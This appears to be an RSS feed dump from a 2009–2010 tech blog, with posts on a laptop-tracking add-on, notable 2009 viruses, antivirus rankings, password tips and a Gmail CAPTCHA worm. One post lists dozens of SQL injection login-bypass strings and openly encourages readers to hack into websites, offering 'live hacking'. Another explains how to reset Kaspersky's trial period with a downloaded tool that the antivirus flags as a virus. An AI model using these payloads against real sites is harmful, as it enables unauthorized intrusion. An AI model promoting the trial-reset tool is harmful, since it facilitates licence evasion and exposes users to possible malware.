<p>The <a title="FireFound Add On" href="http://code.google.com/p/firefound/" target="_blank">FireFound </a>Add-on helps you to track you lost PC. After Installing this add-on to your firefox browser, and the FireFound sends the secure messages to your email ID every time whenever your PC changes the IP address. So you can easily track the IP address and your lost PC.</p>
<p>Apart from tracking your lost PC, this add-on adds more feature to your PC :-</p>
<p><strong>Enable Emergency Data Encryption </strong>:- By this feature it will delete all your saved passwords, deletes the browsing history, download history, delete the search history, cache deletion, cookies, active logins etc.</p>
<p><a href="http://openhippo.com/wp-content/uploads/2010/03/firefound.png"><img class="size-full wp-image-1831 alignnone" title="firefound" src="http://openhippo.com/wp-content/uploads/2010/03/firefound.png" alt="firefound" width="463" height="426" /></a></p>
<p><span style="color: #000000;"><strong>Download FireFound Add-On</strong> </span>:- <span style="color: #ff0000;"><a title="FireFound Add On" href="http://code.google.com/p/firefound/" target="_blank">Download</a></span></p>
<p><strong>Also Read</strong> :- <a title="FireFox Speeding Tricks" href="http://openhippo.com/2009/09/16/firefox-tricks-speedup-your-surfing/" target="_blank">Firefox tricks : Speedup your Surfing</a></p>
<p>Share Your Knowledge.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/track-your-lost-laptop-with-firefound-add-on/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Delete Multiple Twitter Messages with DM deleter</title>
		<link>http://openhippo.com/delete-multiple-twitter-messages-with-dm-deleter/</link>
		<comments>http://openhippo.com/delete-multiple-twitter-messages-with-dm-deleter/#comments</comments>
		<pubDate>Wed, 10 Feb 2010 12:35:12 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Blogging]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[delete spam form twitter]]></category>
		<category><![CDATA[twitter DM deleter]]></category>
		<category><![CDATA[twitter spam deleter]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1588</guid>
		<description><![CDATA[Some of you might be active on the twitter micro blogging, you may be following thousands of peoples, so its not easy to manage your twitter direct messages. There may be reasonable messages and some may be spam. You can simply use the twitter DM deleter ( &#8220;twitter Direct message deleter&#8221; ). It is a [...]]]></description>
			<content:encoded><![CDATA[<p>Some of you might be active on the twitter micro blogging, you may be following thousands of peoples, so its not easy to manage your twitter direct messages. There may be reasonable messages and some may be spam.</p>
<p>You can simply use the twitter DM deleter ( &#8220;twitter Direct message deleter&#8221; ). It is a freeware tool that you can use to delete all the spam in your twitter account.</p>
<div id="attachment_1589" class="wp-caption aligncenter" style="width: 295px"><a href="http://openhippo.com/wp-content/uploads/2010/02/twitter-dm-deleter.jpg"><img class="size-full wp-image-1589" title="twitter dm deleter" src="http://openhippo.com/wp-content/uploads/2010/02/twitter-dm-deleter.jpg" alt="twitter dm deleter" width="285" height="187" /></a><p class="wp-caption-text">twitter dm deleter</p></div>
<p>Now you can look multiple twitter messages in one window.</p>
<div id="attachment_1590" class="wp-caption aligncenter" style="width: 602px"><a href="http://openhippo.com/wp-content/uploads/2010/02/twitter-message-deleter.jpg"><img class="size-full wp-image-1590" title="twitter message deleter" src="http://openhippo.com/wp-content/uploads/2010/02/twitter-message-deleter.jpg" alt="twitter message deleter" width="592" height="352" /></a><p class="wp-caption-text">twitter message deleter</p></div>
<p><a title="Twitter DM Deleer Download" href="http://www.tothepc.com/files/DM_Deleter.zip" target="_blank">Download Twitter DM Deleter</a></p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/delete-multiple-twitter-messages-with-dm-deleter/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Dangerous Virus in 2009 : Virus Book 2009</title>
		<link>http://openhippo.com/dangerous-virus-in-2009-virus-book-2009/</link>
		<comments>http://openhippo.com/dangerous-virus-in-2009-virus-book-2009/#comments</comments>
		<pubDate>Mon, 01 Feb 2010 12:35:15 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[dangerous virus in 2009]]></category>
		<category><![CDATA[deadly virus]]></category>
		<category><![CDATA[virus 2010]]></category>
		<category><![CDATA[virus book]]></category>
		<category><![CDATA[virus list]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1553</guid>
		<description><![CDATA[So here are the viruses that are very famous in year 2009 : - The biggest headache. There can be no doubt that Conficker.C has been the most obnoxious virus over the last 12 months. It first appeared on December 31, 2008, and has spent the last year causing serious infections to companies and home [...]]]></description>
			<content:encoded><![CDATA[<p><strong>So here are the viruses that are very famous in year 2009 :</strong></p>
<p>- <span style="color: #ff0000;">The biggest headache</span>. There can be no doubt that <a href="http://www.pandasecurity.com/homeusers/security-info/204292/Conficker.C" target="_blank"><strong>Conficker.C</strong></a> has been the most obnoxious virus over the last 12 months. It first appeared on December 31, 2008, and has spent the last year causing serious infections to companies and home users alike. The insidious and tenacious nature of this malicious code has earned it first place in our ranking.</p>
<p>- <span style="color: #ff0000;">The Harry Potter of viruses</span>. Although there is no reference to the world&#8217;s most popular fictional wizard, the on-screen messages <strong><a href="http://www.pandasecurity.com/homeusers/security-info/204412/Samal.A" target="_blank">Samal.A</a></strong> displays are all about magic. When it infects a computer, users will see the message “Ah ah you didn&#8217;t say the magic word” and the cursor then flickers waiting for users to enter a word. The truth is, it doesn&#8217;t matter what is entered, because after three attempts, the phrase “Samael has come. This the end” will be displayed and the computer is restarted. <a href="http://openhippo.com/wp-content/uploads/2010/02/samal.a-virus1.jpg"><img class="aligncenter size-full wp-image-1555" title="samal.a virus" src="http://openhippo.com/wp-content/uploads/2010/02/samal.a-virus1.jpg" alt="" width="500" height="81" /></a></p>
<p>- <span style="color: #ff0000;">V for Vendetta</span>. We still don&#8217;t know who is the real target of this vendetta, <a href="http://openhippo.com/wp-content/uploads/2010/02/vedanta.exe.jpg"><img class="alignright size-full wp-image-1556" title="vedanta.exe" src="http://openhippo.com/wp-content/uploads/2010/02/vedanta.exe.jpg" alt="" width="78" height="63" /></a>but <strong><a href="http://www.pandasecurity.com/homeusers/security-info/205263/DirDel.A" target="_blank">DirDel.A</a></strong> wreaks vengeance on infected users, progressively replacing folders in different directories with copies of itself. The worm is carried in a file called Vendetta.exe with a typical Windows folder icon.</p>
<p>- <span style="color: #ff0000;">Plane nuisance</span>. The <a href="http://www.pandasecurity.com/homeusers/security-info/205521/Sinowal.VZR" target="_blank"><strong>Sinowal.VZR</strong></a> Trojan has infected thousands of computers under the guise of plane tickets supposedly purchased by the user. <img class="size-full wp-image-1557 alignnone" title="Sinowal.VZR virus" src="http://openhippo.com/wp-content/uploads/2010/02/Sinowal.VZR-virus.jpg" alt="" width="481" height="419" /></p>
<p><span style="color: #ff0000;"> </span></p>
<p><span style="color: #ff0000;">-The all-action virus</span>. We are talking about <strong><a href="http://www.pandasecurity.com/homeusers/security-info/206552/Whizz.A" target="_blank">Whizz.A</a></strong>. Once infected,</p>
<div id="attachment_1558" class="wp-caption alignright" style="width: 174px"><a href="http://openhippo.com/wp-content/uploads/2010/02/Whizz.A-virus.jpg"><img class="size-full wp-image-1558" title="Whizz.A virus" src="http://openhippo.com/wp-content/uploads/2010/02/Whizz.A-virus.jpg" alt="Whizz.A virus" width="164" height="111" /></a><p class="wp-caption-text">Whizz.A virus</p></div>
<p>computers will start emitting a series of beeps, the mouse pointer moves uncontrollably around the screen, the CD/DVD tray opens and closes, while the screen is ‘decorated’ with a row of bars like those in the image below.</p>
<p>- <span style="color: #ff0000;">The snooper</span>. <a href="http://www.pandasecurity.com/homeusers/security-info/208608/Waledac.AX" target="_blank"><strong>Waledac.AX</strong></a> ensnares its victims by claiming to offer a free application for reading SMS messages on anyone&#8217;s cell phone. Ideal for those that want to check up on their partners. Perhaps that&#8217;s why so many users fell victim to this intelligent virus.</p>
<p>- <span style="color: #ff0000;">The most affectionate</span>. <a href="http://www.pandasecurity.com/homeusers/security-info/209172/BckPatcher.C" target="_blank"><strong>BckPatcher.C </strong></a>tops this category, as it changes the desktop wallpaper to an image reading “virus kiss 2009”. What a charmer!</p>
<p><a href="http://openhippo.com/wp-content/uploads/2010/02/BCKPatcher-Kiss-virus-2009.jpg"><img class="size-full wp-image-1559 alignnone" title="BCKPatcher Kiss virus 2009" src="http://openhippo.com/wp-content/uploads/2010/02/BCKPatcher-Kiss-virus-2009.jpg" alt="" width="480" height="324" /></a></p>
<p>- <span style="color: #ff0000;">A touch of the sniffles</span>. We couldn&#8217;t fail to mention here a couple of the viruses, <strong><a href="http://www.pandasecurity.com/homeusers/security-info/213107/WinVNC.A" target="_blank">WinVNC.A</a></strong> and <a href="http://www.pandasecurity.com/homeusers/security-info/215722/Sinowal.WRN" target="_blank"><strong>Sinowal.WRN</strong></a> that used the widespread alarm surrounding swine flu to trick users and infect their systems.</p>
<p>- <span style="color: #ff0000;">And the award for incompetent newcomer goes to</span>… <strong><a href="http://www.pandasecurity.com/homeusers/security-info/214317/Ransom.K" target="_blank">Ransom.K</a></strong>. This Trojan encrypts documents on infected computers, and then asks for a $100 ransom to release them. However its creator, probably lacking in experience, included a programming error which allows users to release the files with a simple key combination.</p>
<p>- <span style="color: #ff0000;">The most deceitful</span>. This year, the winner in this category is <a href="http://www.pandasecurity.com/homeusers/security-info/215885/FakeWindows.A" target="_blank"><strong>FakeWindows.A</strong></a>, which infects users by passing itself off as a license activation process for Windows XP.</p>
<p>- <span style="color: #ff0000;">The party animal</span>. <a href="http://www.pandasecurity.com/homeusers/security-info/216004/Banbra.GMH" target="_blank"><strong>Banbra.GMH</strong></a> arrives in an email promising photos of Brazilian parties (with dancing girls included)… Who could resist?</p>
<p><strong>Source </strong>: <a href="http://www.pandasecurity.com/homeusers/media/press-releases/viewnews?noticia=10004" target="_blank">Panda Security</a></p>
<p>Share your Knowledge</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/dangerous-virus-in-2009-virus-book-2009/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Top Antivirus 2010</title>
		<link>http://openhippo.com/top-antivirus-2010/</link>
		<comments>http://openhippo.com/top-antivirus-2010/#comments</comments>
		<pubDate>Mon, 01 Feb 2010 12:09:15 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[best antivirus 2010]]></category>
		<category><![CDATA[top antivirus]]></category>
		<category><![CDATA[top antivirus 2010]]></category>
		<category><![CDATA[top antivirus list 2010]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1539</guid>
		<description><![CDATA[Antivirus are the tools/software used for the computer security and data protection. As data are much more important entity for all PC users. In the previous year 2009, many hybrid Trojans were came into the networks, these were very dangerous, each virus/Trojans had one or more dangerous quality. To keep this many anitvirus, updated theirs [...]]]></description>
			<content:encoded><![CDATA[<p>Antivirus are the tools/software used for the computer security and data protection. As data are much more important entity for all PC users. In the previous year 2009, many hybrid Trojans were came into the networks, these were very dangerous, each virus/Trojans had one or more dangerous quality.</p>
<p>To keep this many anitvirus, updated theirs virus library into the software. The following are the Top antivirus in 2010 according to the user comments.</p>
<p><strong>1. Kaspersky Antivirus 2010: <a href="http://www.kaspersky.com/" target="_blank">Download</a><br />
</strong></p>
<div id="attachment_1540" class="wp-caption aligncenter" style="width: 160px"><a href="http://openhippo.com/wp-content/uploads/2010/02/kaspersky-2010-box.jpg"><img class="size-thumbnail wp-image-1540" title="kaspersky-2010" src="http://openhippo.com/wp-content/uploads/2010/02/kaspersky-2010-box-150x150.jpg" alt="kaspersky-2010" width="150" height="150" /></a><p class="wp-caption-text">kaspersky-2010</p></div>
<p><strong>2. Shield Deluxe &#8211; Antivirus Protection: <a href="http://www.pcsecurityshield.com/" target="_blank">Download</a><br />
</strong></p>
<div id="attachment_1541" class="wp-caption aligncenter" style="width: 160px"><a href="http://openhippo.com/wp-content/uploads/2010/02/shield_deluxe_2008.jpg"><img class="size-full wp-image-1541" title="shield_deluxe_2010" src="http://openhippo.com/wp-content/uploads/2010/02/shield_deluxe_2008.jpg" alt="Shield Deluxe" width="150" height="150" /></a><p class="wp-caption-text">Shield Deluxe</p></div>
<p><strong>3.Trend Micro Antivirus Internet Security 2010: </strong><a href="http://apac.trendmicro.com/apac/home/" target="_blank"><strong>Download</strong></a></p>
<p><strong></p>
<div id="attachment_1542" class="wp-caption aligncenter" style="width: 160px"><strong><a href="http://openhippo.com/wp-content/uploads/2010/02/Trend-Micro-Antivirus-Internet-Security-2010.jpg"><img class="size-full wp-image-1542" title="Trend Micro Antivirus Internet Security 2010" src="http://openhippo.com/wp-content/uploads/2010/02/Trend-Micro-Antivirus-Internet-Security-2010.jpg" alt="Trend Micro Antivirus" width="150" height="150" /></a></strong><p class="wp-caption-text">Trend Micro Antivirus</p></div>
<p></strong></p>
<p><strong> 4. Norton Antivirus 2010 : </strong><a href="http://www.symantec.com/norton/antivirus" target="_blank"><strong>Download</strong></a></p>
<div id="attachment_1543" class="wp-caption aligncenter" style="width: 160px"><a href="http://openhippo.com/wp-content/uploads/2010/02/symantec-norton-antivirus-2010.jpg"><img class="size-full wp-image-1543" title="symantec-norton-antivirus-2010" src="http://openhippo.com/wp-content/uploads/2010/02/symantec-norton-antivirus-2010.jpg" alt="Norton Antivirus 2010  " width="150" height="150" /></a><p class="wp-caption-text">Norton Antivirus 2010  </p></div>
<p><strong>5. Panda Antivirus Pro 2010: </strong><a href="http://www.pandasecurity.com/usa/homeusers/solutions/antivirus/" target="_blank"><strong>Download</strong></a></p>
<p><strong></p>
<div id="attachment_1544" class="wp-caption aligncenter" style="width: 160px"><strong><a href="http://openhippo.com/wp-content/uploads/2010/02/Panda-Antivirus-Pro-2010.jpg"><img class="size-full wp-image-1544" title="Panda Antivirus Pro 2010" src="http://openhippo.com/wp-content/uploads/2010/02/Panda-Antivirus-Pro-2010.jpg" alt="Panda Antivirus Pro 2010" width="150" height="150" /></a></strong><p class="wp-caption-text">Panda Antivirus Pro 2010 </p></div>
<p>6. ESET NOD32 Antivirus: <a href="http://www.eset.com/" target="_blank"><strong>Download</strong></a></p>
<div id="attachment_1545" class="wp-caption aligncenter" style="width: 160px"><strong><a href="http://openhippo.com/wp-content/uploads/2010/02/ESET-NOD32-Antivirus.jpg"><img class="size-full wp-image-1545" title="ESET NOD32 Antivirus" src="http://openhippo.com/wp-content/uploads/2010/02/ESET-NOD32-Antivirus.jpg" alt="ESET NOD32 Antivirus " width="150" height="150" /></a></strong><p class="wp-caption-text">ESET NOD32 Antivirus </p></div>
<p></strong></p>
<p><strong>7. ZoneAlarm Anti-virus 2010 : </strong><a href="http://www.zonealarm.com/" target="_blank"><strong>Download</strong></a></p>
<div id="attachment_1546" class="wp-caption aligncenter" style="width: 160px"><strong><strong><a href="http://openhippo.com/wp-content/uploads/2010/02/ZoneAlarm-Anti-virus-2010.jpg"><img class="size-full wp-image-1546" title="ZoneAlarm Anti-virus 2010" src="http://openhippo.com/wp-content/uploads/2010/02/ZoneAlarm-Anti-virus-2010.jpg" alt="ZoneAlarm Anti-virus 2010    " width="150" height="150" /></a></strong></strong><p class="wp-caption-text">ZoneAlarm Anti-virus</p></div>
<p><strong>8. AVG Free Antivirus 2010 : </strong><a href="http://www.avg.com/in-en/homepage" target="_blank"><strong>Download</strong></a></p>
<div id="attachment_1547" class="wp-caption aligncenter" style="width: 160px"><a href="http://openhippo.com/wp-content/uploads/2010/02/avg-free-2010.jpg"><img class="size-full wp-image-1547" title="avg free 2010" src="http://openhippo.com/wp-content/uploads/2010/02/avg-free-2010.jpg" alt="avg free 2010" width="150" height="150" /></a><p class="wp-caption-text">avg free 2010</p></div>
<p><strong>9. BitDefender Antivirus 2010 : </strong><a href="http://www.bitdefender.com/" target="_blank"><strong>Download</strong></a></p>
<div id="attachment_1548" class="wp-caption aligncenter" style="width: 160px"><a href="http://openhippo.com/wp-content/uploads/2010/02/BitDefender-Antivirus-2010.gif"><img class="size-full wp-image-1548" title="BitDefender Antivirus 2010" src="http://openhippo.com/wp-content/uploads/2010/02/BitDefender-Antivirus-2010.gif" alt="BitDefender Antivirus 2010" width="150" height="150" /></a><p class="wp-caption-text">BitDefender Antivirus</p></div>
<p><strong>10. McAfee Antivirus 2010 : </strong><a href="http://www.mcafee.com/" target="_blank"><strong>Download</strong></a></p>
<div id="attachment_1549" class="wp-caption aligncenter" style="width: 160px"><a href="http://openhippo.com/wp-content/uploads/2010/02/MacAfee-Antiyirus-2010.jpg"><img class="size-full wp-image-1549" title="MacAfee Antiyirus 2010" src="http://openhippo.com/wp-content/uploads/2010/02/MacAfee-Antiyirus-2010.jpg" alt="MacAfee Antiyirus 2010" width="150" height="150" /></a><p class="wp-caption-text">McAfee Antiyirus</p></div>
<p>These are the top 10 antivirus in the starting of 2010. Last year some of the antivirus were are the same position like Kaspersky, Nortan, Node32..</p>
<p>Use the antivirus and that also updated version, to protect your data.</p>
<p><strong><br />
</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/top-antivirus-2010/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Use Kaspersky after 30 days trial period</title>
		<link>http://openhippo.com/use-kaspersky-after-30-days-trial-period/</link>
		<comments>http://openhippo.com/use-kaspersky-after-30-days-trial-period/#comments</comments>
		<pubDate>Sun, 03 Jan 2010 11:09:14 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[Windows XP]]></category>
		<category><![CDATA[kaspersky 30 days trial reset]]></category>
		<category><![CDATA[kaspersky hack]]></category>
		<category><![CDATA[kaspersky reset]]></category>
		<category><![CDATA[reset 30 days trial]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1451</guid>
		<description><![CDATA[Kaspersky antivirus and internet security is one of the best antivirus tool available, since 2006 kaspersky is leading the antivirus market after the bitdefender. I am a Ubuntu guy, so I less go in the windows but You might be using the kaspersky to clean up your PC. Kaspersky gives a 30 days trail pack, [...]]]></description>
			<content:encoded><![CDATA[<p>Kaspersky antivirus and internet security is one of the best antivirus tool available, <a href="http://openhippo.com/wp-content/uploads/2010/01/192479.jpg"><img class="size-full wp-image-1452 alignright" title="kaspersky reset" src="http://openhippo.com/wp-content/uploads/2010/01/192479.jpg" alt="kaspersky reset" width="184" height="170" /></a>since 2006 kaspersky is leading the antivirus market after the bitdefender.</p>
<p>I am a Ubuntu guy, so I less go in the windows but You might be using the kaspersky to clean up your PC.</p>
<p>Kaspersky gives a 30 days trail pack, to use their antivirus, after that kaspersky is disabled and its not possible to use the kaspersky antivirus, even you uninstall the kaspersky.</p>
<p><strong>How to use the Kaspesky antivirus after 30 days trial.</strong></p>
<p><span style="color: #800000;">Here are the steps :</span></p>
<p>1. Unistall the Kaspersky.</p>
<p>2. install the tool( kaspesky will say, that it is virus) but its not, i used ans my friend are using that tool to reset the kaspersky.</p>
<p>3. Download the tool [ <a href="http://www.ziddu.com/download/5285847/BOX_KTR_v2.5A.rar.html" target="_blank">here</a> ]</p>
<p>4. Now run the tool, it will clean the Kapsersky restrickted registry keys.</p>
<p>5. Now you install the Kapsersky, it will activate for the another 30 days.</p>
<p>SO after 30 days do the same..</p>
<p>ENjoy your PC</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/use-kaspersky-after-30-days-trial-period/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>SQL injection strings : Hack the day</title>
		<link>http://openhippo.com/sql-injection-strings-hack-the-day/</link>
		<comments>http://openhippo.com/sql-injection-strings-hack-the-day/#comments</comments>
		<pubDate>Thu, 24 Dec 2009 07:37:35 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[enter into website]]></category>
		<category><![CDATA[hack a website]]></category>
		<category><![CDATA[sql attack]]></category>
		<category><![CDATA[sql injection strings]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1378</guid>
		<description><![CDATA[Here I am posting some of the SQL injection strings that you can use to hack into the website. I have done some practical work out of this, if someone wants to go live hacking using these SQL injection strings, contact to me. If someone is pro of breaking into venerable systems and sites. please [...]]]></description>
			<content:encoded><![CDATA[<p>Here I am posting some of the SQL injection strings that you can use to hack into the website.</p>
<p>I have done some practical work out of this, if someone wants to go live hacking using these SQL injection strings, contact to me.</p>
<p>If someone is pro of breaking into venerable systems and sites. please share your expriences/</p>
<p style="text-align: center;">&#8216; or 0=0 &#8211;<br />
&#8216; or 0=0 &#8211;&#8217;<br />
&#8216; or 0=0 #<br />
&#8221; or 0=0 &#8211;<br />
&#8221; or 0=0 &#8211;&#8217;<br />
&#8216;&#8221;  or 0=0 &#8211;<br />
or 0=0 &#8211;<br />
&#8216; or 0=0 #<br />
&#8221; or 0=0 #<br />
or 0=0 #<br />
&#8216; or &#8216;x&#8217;='x<br />
&#8221; or &#8220;x&#8221;=&#8221;x<br />
&#8216;) or (&#8216;x&#8217;='x<br />
&#8221; or 1=1&#8211;<br />
or 1=1&#8211;<br />
&#8216; or a=a&#8211;&#8217;<br />
&#8216; or a=a #<br />
&#8216; or a=a&#8211;<br />
&#8216; or &#8220;a&#8221;=&#8221;a<br />
&#8216; or &#8216;a&#8217;='a<br />
&#8221; or &#8220;a&#8221;=&#8221;a<br />
&#8216;) or (&#8216;a&#8217;='a<br />
&#8220;) or (&#8220;a&#8221;=&#8221;a<br />
hi&#8221; or &#8220;a&#8221;=&#8221;a<br />
hi&#8221; or 1=1 &#8211;<br />
hi&#8217; or 1=1 &#8211;<br />
hi&#8217; or &#8216;a&#8217;='a<br />
hi&#8217;) or (&#8216;a&#8217;='a<br />
hi&#8221;) or (&#8220;a&#8221;=&#8221;a<br />
&#8216; or 1=1&#8211;<br />
&#8221; or 1=1&#8211;<br />
or 1=1&#8211;<br />
&#8216; or &#8216;a&#8217;='a<br />
&#8221; or &#8220;a&#8221;=&#8221;a</p>
<p style="text-align: center;">&#8216;) or (&#8216;a&#8217;='a</p>
<p style="text-align: center;">admin&#8217;&#8211;<br />
&#8216; or 1=1&#8211;<br />
&#8216;&#8221; or 1=1&#8211;<br />
&#8216; union select 1, &#8216;Eyeless&#8217;, &#8216;ez2do&#8217;, 1&#8211;<br />
admin&#8217;&#8211;<br />
administrator&#8217;&#8211;<br />
superuser&#8217;&#8211;<br />
test&#8217;&#8211;</p>
<p style="text-align: left;">This is the short list but these SQL injection strings are much powerful.</p>
<p style="text-align: left;"><strong>I have another hint :</strong></p>
<p style="text-align: left;">Some of the SQL supporting system doesn&#8217;t support.</p>
<p style="text-align: left;">For example<br />
&#8221; or &#8220;a&#8221;=&#8221;a<br />
&#8216;) or (&#8216;a&#8217;='a</p>
<p>on some databases one would work, other wouldn&#8217;t.. first one would enclose the username (or pass) in quotes&#8230; first it would CLOSE the quotes (making it &#8220;&#8221;) and then says.. or &#8220;a&#8221;=&#8221;a.. the last quote would be closeing the final a.. and &#8220;a&#8221;=&#8221;a&#8221; is always true, so that would be how it works<br />
however, the second uses (&#8216;Username&#8217;).. and changing it to say &#8220;(&#8221;) or (&#8216;a&#8217;='a&#8217;)&#8221;</p>
<p style="text-align: left;">
<p style="text-align: left;">Enjoy the HACK DAY <img src='http://openhippo.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/sql-injection-strings-hack-the-day/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Google advice:Choosing a smart password</title>
		<link>http://openhippo.com/google-advicechoosing-a-smart-password/</link>
		<comments>http://openhippo.com/google-advicechoosing-a-smart-password/#comments</comments>
		<pubDate>Wed, 07 Oct 2009 09:55:27 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Blogging]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[google strong password]]></category>
		<category><![CDATA[hotmail email scam]]></category>
		<category><![CDATA[how to choose strong password]]></category>
		<category><![CDATA[password assistance]]></category>
		<category><![CDATA[strong password]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1316</guid>
		<description><![CDATA[In the recent days we all came throughÂ  a news that about 30,000 hotmail email account had been exposed, this is really a big news for all the NET world. It is not only the hotmail who had sufferes but also gmail , yahoo accounts had been exposed. The only reason behind this is the [...]]]></description>
			<content:encoded><![CDATA[<p>In the recent days we all came throughÂ  a news that about 30,000 hotmail email account had been exposed, this is really a big news for all the NET world. It is not only the hotmail who had sufferes but also gmail , yahoo accounts had been exposed. The only reason behind this is the PHISHING page.</p>
<p><img class="aligncenter size-full wp-image-1317" title="password secure" src="http://openhippo.com/wp-content/uploads/2009/10/password-secure.jpg" alt="password secure" width="459" height="302" /></p>
<p>Phishing page is similar look and feel page of any real site.</p>
<p>Yesterday on the gmail blog I read about how to choose the <a href="http://gmailblog.blogspot.com/2009/10/choosing-smart-password.html" target="_blank">smart passwords</a>.</p>
<p><strong>- Use Different password at different levels</strong> :- Meaning is that don&#8217;t always use a single password everywhere. It is not good sense that somebody is using the gmail password and twitter , facebook or his/her online bank account password same. It is always recommended to choose different password at different levels.</p>
<p><strong>- Don&#8217;t use your personal data in password:-</strong> So while choosing the password, you might think of easy to remember its good but what first comes in your mind is the your &#8220;<strong> personal related password string</strong> &#8220;, That really bad way, don&#8217;t use your personal information in the password.</p>
<p><strong>-Don&#8217;t use common words or sequences:-</strong> Ok, here you are suggest not to choose your password containing common words or sequences. Example:-<br />
&#8220;smartboy&#8221; or &#8220;coolguy&#8221; is not the strong password, so it can be cracked easily. You can modify above password as &#8221; sm4rtB0y&#8221; and &#8221; C0oLg8y &#8220;.</p>
<p><strong>- Make sure that password recovery question is also secure :- </strong>Securing the password is not a winning a battle but you may also think of your security question, Hackers uses this way and also easily crack the email accounts and other accounts, so choose the strong question and you are suggested to Choose your own question, never give the hint which can directly understood.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/google-advicechoosing-a-smart-password/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Worm Solved the Gmail CAPTCHA &#8216; Create Fake Accounts &#8216;</title>
		<link>http://openhippo.com/worm-solved-the-gmail-captcha-create-fake-accounts/</link>
		<comments>http://openhippo.com/worm-solved-the-gmail-captcha-create-fake-accounts/#comments</comments>
		<pubDate>Sun, 26 Apr 2009 04:54:31 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[captcha worm]]></category>
		<category><![CDATA[gmail account hack]]></category>
		<category><![CDATA[gmail worm]]></category>
		<category><![CDATA[google captcha worm]]></category>
		<category><![CDATA[W32.Gaptcha.Worm]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=629</guid>
		<description><![CDATA[Solving the Google CAPTCHA is great, because Google is more concern about the security. But this week the Vietnamese security company find out that the &#8221; W32.Gaptcha.Worm &#8221; break into the GMAIL Account and send the spams all over. Once a computer is infected with W32.Gaptcha, the worm launches the Internet Explorer browser and goes [...]]]></description>
			<content:encoded><![CDATA[<p><br/>Solving the Google CAPTCHA is great, because Google is more concern about the security. But this week the Vietnamese security company find out that the &#8221; W32.Gaptcha.Worm &#8221; break into the GMAIL Account and send the spams all over.</p>
<div id="attachment_634" class="wp-caption alignright" style="width: 310px"><img class="size-full wp-image-634 " title="captcha-worm" src="http://openhippo.com/wp-content/uploads/2009/04/captcha-worm.jpg" alt="Gmail CAPTCHA Worm" width="300" height="294" /><p class="wp-caption-text">Gmail CAPTCHA Worm</p></div>
<p>Once a computer is infected with W32.Gaptcha, the worm launches the Internet Explorer browser and goes to Gmail&#8217;s new account registration page. It begins to fill in random names of fictitious users. When confronted with a CAPTCHA, the worm sends the image to a remote server for processing, wrote Do Manh Dung, senior malware researcher said.</p>
<blockquote><p>A CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) is the distorted text that a person must solve before a new account can be created. It used to be hard for computers to translate the text, but improvements in OCR (optical character recognition) technology have overcome that barrier. In some cases, spammers are believed to employ people in low-income countries to figure out the CAPTCHA in order to gain new e-mail accounts.</p></blockquote>
<p>Once a new registration is complete, the account details are then e-mailed to a spammer. After too many account registrations, Google will eventually block the particular computer creating the accounts. The worm then removes itself, Dung wrote.</p>
<p>Google officials contacted in London did not have a comment on the latest worm, but it and other companies that provide free e-mail accounts have been besieged over the last few years by spammers using sophisticated techniques to create fake accounts.</p>
<p>Free e-mail accounts are valuable to spammers. E-mail sent from those accounts has a better chance of making it past antispam filters since it comes a trusted domain, although companies use other methods such as text analysis to pluck out rubbish e-mail.</p>
<h3>Use the good Antivirus( I recommend Kaspersky 7 or Above )</h3>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/worm-solved-the-gmail-captcha-create-fake-accounts/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
